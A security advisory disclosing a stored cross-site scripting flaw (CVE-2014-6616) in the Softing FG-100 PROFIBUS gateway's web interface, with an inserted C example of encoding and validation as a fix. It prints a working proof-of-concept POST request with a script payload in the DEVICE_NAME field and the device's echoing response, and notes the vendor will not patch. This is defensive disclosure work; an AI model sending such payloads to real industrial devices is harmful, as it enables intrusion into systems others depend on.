CVE-2014-6616 Softing FG-100 Webui XSS Nov 05 2014 07:52AM
Ingmar Rosenhagen (ingmar rosenhagen csnc de)
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Softing FG-100 PB
# Vendor: Softing AG (www.softing.com)
# CVE ID: CVE-2014-6616
# Subject: XSS
# Risk: High
# Effect: Remotely exploitable
# Author: Johannes Klick
# Daniel Marzin
# Ingmar Rosenhagen
# Date: 05.11.2014
#
#############################################################

Introduction:
-------------
Softing FG PROFIBUS [1] is a family of interfaces for remote access to
one, two or three PROFIBUS segments via Ethernet for device
parameterization, controller programming and data acquisition. The
device is used in industrial setups to make PROFIBUS devices available
via Ethernet. Compass Security Deutschland GmbH [2] discovered a security
flaw in the device's web GUI which allows execution of malicious
code in the context of the user's browser session.

Affected:
---------
Firmware: FG-x00-PB_V2.02.0.00

Technical Description:
----------------------
The web GUI does not properly encode user-supplied data on output in at
least one place. Exploiting this vulnerability leads to stored cross-site
scripting (XSS) and allows execution of JavaScript code in the context of
the user's browser session.

The vulnerable resource is the 'DEVICE_NAME' parameter:

POST /cgi-bin/CFGhttp HTTP/1.1
Host: 192.168.2.3
Referer: http://192.168.2.3/cgi-bin/CFGhttp

second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DEVICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_ORG=192.168.212.231&STARTUP=RELOAD

Which results in the malicious code being embedded:

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache, must-revalidate
Pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN""http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Device Configuration</title></head><link
rel="stylesheet" type="text/css"
href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network
Settings</h1><table cellspacing=0 summary=""><tr><td><strong> Host Name
</strong></td><td> <SCRIPT>alert("XSS")</SCRIPT> </td><td>
</td></tr><tr><td><strong> IP Address </strong></td><td> 192.168.2.3
</td><td> </td></tr><tr><td><strong> Subnet Mask
</strong></td><td> 255.255.255.0 </td><td>
</td></tr><tr><td><strong> Default Gateway </strong></td><td>
</td><td> </td></tr><tr><td><strong> Maintenance IP Address
</strong></td><td> 192.168.212.231 </td><td>
</td></tr><tr><td><strong> New network parameters will be used
</strong></td><td> immediately
</td><td></td></tr></table><br></body></html>
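As an added example (not Softing's firmware code), the two controls that close this class of bug in a C CGI handler: rejecting a DEVICE_NAME that is not valid host-name syntax before it is stored, and HTML-encoding the value where the "New Network Settings" page echoes it. The 63-byte label limit and the snprintf-based row renderer are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Output encoding: escapes the characters that change meaning inside an
 * HTML text node or attribute. Returns bytes written (without the NUL),
 * or -1 when `out` cannot hold the encoded value plus NUL. */
int html_escape(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep = one;           /* default: copy the byte as-is */
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = strlen(rep);
        if (n + len >= outlen) return -1; /* keep room for the NUL */
        memcpy(out + n, rep, len);
        n += len;
    }
    if (n >= outlen) return -1;
    out[n] = '\0';
    return (int)n;
}

/* Input validation (assumed policy): RFC 1123 host-name label characters
 * only (letters, digits, '-'), 1..63 bytes, no leading or trailing '-'.
 * Markup never reaches storage, so nothing is persisted for later pages. */
int valid_device_name(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 63 || s[0] == '-' || s[len - 1] == '-') return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && *s != '-') return 0;
    return 1;
}

/* Renders the Host Name row shown in the advisory's response, encoded. */
int render_host_row(const char *name, char *out, size_t outlen)
{
    char enc[256];
    if (html_escape(name, enc, sizeof enc) < 0) return -1;
    int r = snprintf(out, outlen,
        "<tr><td><strong> Host Name </strong></td><td> %s </td><td> </td></tr>", enc);
    return (r < 0 || (size_t)r >= outlen) ? -1 : r;
}
```

Both layers belong together: validation stops the payload at the POST, and encoding protects every page that later prints the stored name, including values written before the validation existed.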

Workaround / Fix:
-----------------
No patch is available.

Timeline:
---------
Vendor Notified: 2014-09-15
Vendor Response: 2014-10-24
Vendor Status: Won't fix

References:
-----------
[1]: http://industrial.softing.com/de/produkte/profibus-master-or-slave-configurable-single-channel-remote-interface.html
[2]: http://www.csnc.de
